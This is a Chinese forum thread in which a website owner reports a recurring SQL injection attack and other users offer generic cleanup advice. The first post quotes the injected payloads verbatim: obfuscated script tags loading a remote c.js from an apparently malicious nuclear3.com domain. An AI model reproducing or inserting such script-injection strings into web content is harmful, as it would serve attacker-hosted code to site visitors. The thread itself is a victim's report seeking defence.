瑞星卡卡安全论坛技术交流区入侵防御(HIPS) SQL注入攻击现象全过程(求助)

12   1  /  2  页   跳转

SQL注入攻击现象全过程(求助)

SQL注入攻击现象全过程(求助)

具体表现为:
网站数据库的数据表的用户信息后面被写入"!<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>"
删除了其代码又自动生成...

最新特征:

1、用户发布新信息内容后在5个小时左右,在数据表的相关字段写入“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>“
2、删除代码后第一次在用户信息内容里被写入的是"</Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>"过几个小时后写入两段就成“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>”再过几个小时后写入3段就成“.<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script><Script Src=http://c.nucl%65%61r3.com/css/c.js></Script>”


例子网站:

华派信息网(http://www.hp5e.com)

望专家尽快作出解决方案,以免更多网站受其害!

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
分享到:
gototop
 

回复:SQL注入攻击现象全过程(求助)

sql注入,应该与系统80端口被攻击有关,需要先清除恶意代码,之后升级杀毒软件查杀,
若查杀无效,建议扫SRENG日志发这论坛来
下载SRENG2.6版工具:http://www.kztechs.com/sreng/download.html
SRENG工具的扫描日志操作,看这贴2楼:http://bbs.ikaka.com/showtopic-8442813.aspx
╭∩╮(︶︿︶)╭∩╮
gototop
 

回复:SQL注入攻击现象全过程(求助)

该用户帖子内容已被屏蔽
gototop
 

回复:SQL注入攻击现象全过程(求助)

瑞星防毒墙,对这次的攻击是防不住了!
gototop
 

回复:SQL注入攻击现象全过程(求助)

SQL注入通常是通过80端口提交的一段数据库查询语句,和正常的web访问没什么区别,防毒墙一般不可能把web服务器的80端口给封了。查查 IIS的日志吧,也许能发现一些攻击的行为。当然网站如果存在SQL注入点,还是尽量检查出来并消除吧。
gototop
 

回复: SQL注入攻击现象全过程(求助)

我和楼主一样,也遇到了这个人的功击!

目前也还没有找出解决办法,请高手们帮帮忙
gototop
 

回复 4F xiang730988 的帖子

防毒墙是硬件~~不是软件~呵呵
gototop
 

回复:SQL注入攻击现象全过程(求助)

该用户帖子内容已被屏蔽
gototop
 

回复:SQL注入攻击现象全过程(求助)

我也有这毛病
gototop
 

回复:SQL注入攻击现象全过程(求助)

keesun 的自身代码不完善~  你应该去找他们~
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT